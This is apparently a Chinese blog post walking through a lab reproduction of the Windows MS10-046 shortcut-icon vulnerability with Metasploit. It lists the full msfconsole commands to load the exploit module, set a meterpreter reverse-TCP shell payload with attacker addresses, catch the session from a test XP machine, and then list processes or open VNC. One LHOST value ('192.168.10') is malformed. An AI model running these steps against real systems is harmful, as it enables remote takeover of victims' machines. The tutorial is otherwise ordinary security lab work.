Windows漏洞MS10-046测试

开始复现

命令:

msfconsole    //启动MSF Metasploit
search ms10-046   //搜索漏洞
use windows/browser/ms10_046_shortcut_icon_dllloader  //加载漏洞模块
set payload windows/meterpreter/reverse_tcp   //设置一个PAYLOAD为反弹连接shell
show options     //查看相关设置
set SRVHOST 192.168.1.10      //设置攻击者自身IP
set LHOST 192.168.10             //设置反弹连接回来的IP (攻击者自身IP)
exploit/run         //开始执行漏洞...
图片[1]-Windows漏洞MS10-046测试-铭心博客

会生成一个URL连接  复制这个地址 去另一台XP系统机器上测试  用浏览器打开会跳到共享文件夹下

图片[2]-Windows漏洞MS10-046测试-铭心博客

然后来到MSF终端看见漏洞执行成功了  有一个连接会话 ID 1

 命令 :

sessions -l        查看存在的会话
sessions -i 1       选着会话1
图片[3]-Windows漏洞MS10-046测试-铭心博客

输入ps命令查看进程   或者 输入run vnc 查看远程桌面 等等

图片[4]-Windows漏洞MS10-046测试-铭心博客
图片[5]-Windows漏洞MS10-046测试-铭心博客
© 版权声明
THE END
喜欢就支持一下吧!
点赞105 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容